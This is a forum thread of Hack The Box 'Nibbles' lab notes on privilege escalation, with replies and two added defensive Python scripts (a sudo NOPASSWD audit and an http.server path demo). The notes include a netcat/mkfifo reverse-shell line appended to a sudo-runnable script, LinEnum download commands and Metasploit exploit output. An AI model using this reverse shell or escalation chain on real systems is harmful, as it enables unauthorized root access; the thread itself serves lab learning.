Getting Started: Nibbles - Privilege Escalation PART 2 (Walk-through + Questions)

Hello.

Just wanted to post my notes regarding the ‘Escalate privileges and submit the root.txt flag’ question within the Getting Started: Nibbles - Privilege Escalation PART 2 Hack the Box Module.

I ran into trouble with the reverse shell appendage to the monitor.sh file, so I hope this guide provides some relief to potential troubleshooters.

I also hope people discuss answers to both of my questions at the end of my exercise notes.

Thank you for your time.

---------------------------------- BEGIN EXERCISE NOTES + QUESTIONS: -----------------------------------------
Exercise notes:
Escalate privileges and submit the root.txt flag.
*** Note: Must get reverse web-shell access from previous exercise ***

unzip personal.zip
wget <web address to Bourne shell script (.sh)> (home terminal)

hostname -I

sudo python3 -m http.server 8080 (on home terminal)
wget http://< home ip >:8080/LinEnum.sh (on target terminal)

  • Get 200 confirmation

chmod +x LinEnum.sh
./LinEnum.sh

  • Note: Chill for 2 minutes.
  • Note: The information regarding sudo commands without passwords exists in the ‘[-] Super user account(s):’ section of the response.

cd /home/nibbler/personal/stuff
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <Home IP> 8443 >/tmp/f' | tee -a monitor.sh

[CTRL] + [Z] (In original home terminal (still running sudo python3 -m http.server 8080))
sudo nc -lnvp 8443 (home terminal)
sudo /home/nibbler/personal/stuff/monitor.sh (target terminal)

  • id
  • python3 -c 'import pty; pty.spawn("/bin/bash")'
  • cd ~
    - cat root.txt

Question(s):
Does the link to the LinEnum Bourne shell script < https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh > include the repo?

The reverse shell in monitor.sh did not seem to work without the port number 8443. Is there a reason the reverse shell does not work (at least for me) without port 8443?
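The root path in the notes above exists because nibbler may run monitor.sh as root without a password while also being able to edit that file. The following audit script, added here as an example and not taken from the HTB module or from this thread, parses `sudo -l`-style output (the sample text is constructed in the layout `sudo -l` prints; only the monitor.sh path comes from the notes) and reports, for every NOPASSWD command, the permission problems that would let a non-root user change what sudo executes. The two scripts it checks are created in a temporary directory for the demo.

```python
"""Flag NOPASSWD sudo rules whose target a non-root user can modify.

Added example; not code from the HTB module or this thread. Sample `sudo -l`
text and the files it inspects are constructed for the demonstration.
"""
import os
import re
import stat
import tempfile

# Constructed sample in the layout `sudo -l` prints; only the path is from the notes.
SAMPLE_SUDO_L = """\
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
"""

# One rule line: "(runas) [TAG: ...] command[, command...]"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>\S.*?)\s*$")

FILE_WORLD_WRITABLE = "file world-writable"
FILE_GROUP_WRITABLE = "file group-writable"
FILE_NOT_ROOT_OWNED = "file not owned by root"
DIR_WORLD_WRITABLE = "parent directory world-writable (file can be replaced)"
MISSING = "command path missing (whoever can create it controls it)"


def parse_sudo_l(text):
    """Return (runas, nopasswd, command) tuples from `sudo -l` output."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            # sudoers may list arguments ("/usr/bin/foo bar"); the file is the first token.
            rules.append((m.group("runas"), nopasswd, cmd.strip().split()[0]))
    return rules


def writable_reasons(path):
    """Ways a non-root user could alter what sudo will run from `path`."""
    reasons = []
    try:
        st = os.stat(path)
    except FileNotFoundError:
        reasons.append(MISSING)
    else:
        if st.st_mode & stat.S_IWOTH:
            reasons.append(FILE_WORLD_WRITABLE)
        if st.st_mode & stat.S_IWGRP:
            reasons.append(FILE_GROUP_WRITABLE)
        if st.st_uid != 0:
            reasons.append(FILE_NOT_ROOT_OWNED)
    try:
        parent = os.stat(os.path.dirname(path) or "/")
    except FileNotFoundError:
        return reasons
    # A world-writable directory without the sticky bit lets anyone rename or replace entries.
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        reasons.append(DIR_WORLD_WRITABLE)
    return reasons


def audit(rules):
    """For each NOPASSWD rule naming an absolute path, list why it is risky."""
    findings = {}
    for runas, nopasswd, cmd in rules:
        if nopasswd and cmd.startswith("/"):
            findings[cmd] = writable_reasons(cmd)
    return findings


def make_demo_files():
    """Constructed stand-ins: a user-writable monitor.sh next to a 0755 script."""
    d = tempfile.mkdtemp()
    unsafe = os.path.join(d, "monitor.sh")
    safe = os.path.join(d, "backup.sh")
    for p in (unsafe, safe):
        with open(p, "w") as f:
            f.write("#!/bin/sh\necho monitoring\n")
    os.chmod(unsafe, 0o777)
    os.chmod(safe, 0o755)
    return unsafe, safe


if __name__ == "__main__":
    print(parse_sudo_l(SAMPLE_SUDO_L))
    unsafe, safe = make_demo_files()
    for cmd, reasons in audit([("root", True, unsafe), ("root", True, safe)]).items():
        print(cmd, "->", reasons or ["no writable path found"])
```

Run as an unprivileged user, both demo files are also reported as "file not owned by root", which is the same finding LinEnum's super-user section hints at: a NOPASSWD target that root does not own is only as trustworthy as its owner. The fix on a real host is to make the script and its directory root-owned and not writable by the sudoer, or to drop the NOPASSWD rule.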

Hey @Jordan_HTB

Env: Kali Linux working with OpenVpn file given

Great help here! I am struggling with getting a 200 response after running

python server on home terminal

I go back to target machine (inside bash)

enter: wget http://(local IP):8080/LinEnum.sh

When I run this command, the Python server returns a 404 error with the message "File not found".

Am I doing something wrong here?

Any assistance would be great help :smiley:

Update @Jordan_HTB

I managed to get a 200 response. Not sure why; I ran the Python server within the LinEnum.sh directory this time. Is that where I was going wrong before, not having the server run from there?

Glad you got the 200 response!
To be sure, I am unsure of the reason behind the spontaneous 200 response.
I could test your theory of the python server running from the LinEnum.sh directory; though I have a feeling your note may help someone down the line without an immediate test!
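The 404-versus-200 behaviour in the exchange above comes down to where the server is started: `python3 -m http.server` hands out files from its working directory (or the one passed with `--directory`), so `/LinEnum.sh` is only found when the file sits directly in that directory. The script below is an added example, not code from the module or from either poster; it reuses the standard library handler's own `translate_path()` mapping without opening a socket, and the directory tree it checks is constructed in a temporary folder with a placeholder `LinEnum.sh`.

```python
"""Show which file `python3 -m http.server` would hand out for a request.

Added example; not code from the HTB module or this thread. Directories and
the placeholder LinEnum.sh are constructed for the demo.
"""
import os
import tempfile
from http.server import SimpleHTTPRequestHandler


class PathOnlyHandler(SimpleHTTPRequestHandler):
    """Skip the socket setup; only the stdlib path-mapping method is needed."""

    def __init__(self, directory):
        # translate_path() reads self.directory, which http.server sets from
        # --directory or the current working directory when the server starts.
        self.directory = directory


def would_serve(serve_dir, url_path):
    """Return (status, resolved_path) as the server would decide it."""
    resolved = PathOnlyHandler(serve_dir).translate_path(url_path)
    status = 200 if os.path.isfile(resolved) else 404
    return status, resolved


def make_demo_tree():
    """Constructed layout: <home>/tools/LinEnum.sh, server started in <home> or <home>/tools."""
    home = tempfile.mkdtemp()
    tools = os.path.join(home, "tools")
    os.mkdir(tools)
    with open(os.path.join(tools, "LinEnum.sh"), "w") as f:
        f.write("#!/bin/bash\n# placeholder, not the real LinEnum\n")
    return home, tools


if __name__ == "__main__":
    home, tools = make_demo_tree()
    for d in (home, tools):
        print(d, "/LinEnum.sh ->", would_serve(d, "/LinEnum.sh"))
    # ".." components are dropped, so the tree above the served directory stays private.
    print(would_serve(tools, "/../../etc/passwd"))
```

Starting the server one level up and requesting `/tools/LinEnum.sh` works just as well as starting it inside the tools directory; the last call shows that the handler discards `..` components, so a server started in a scratch directory exposes only that directory, which is the reason to start it there rather than in your home folder.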

How do I do a manual cleanup of image.php?

msf6 exploit(multi/http/nibbleblog_file_upload) > run

[*] Started reverse TCP handler on 172.30.249.74:4444
[!] This exploit may require manual cleanup of 'image.php' on the target
[*] Exploit completed, but no session was created.

Remember that you are transferring linenum.sh from your local machine to the target, and sometimes the target does not have wget installed, so try curl:

curl http://x.x.x.x:xxxx/linenum.sh -o linenum.sh

Try using your tun0 ip address. It works for me.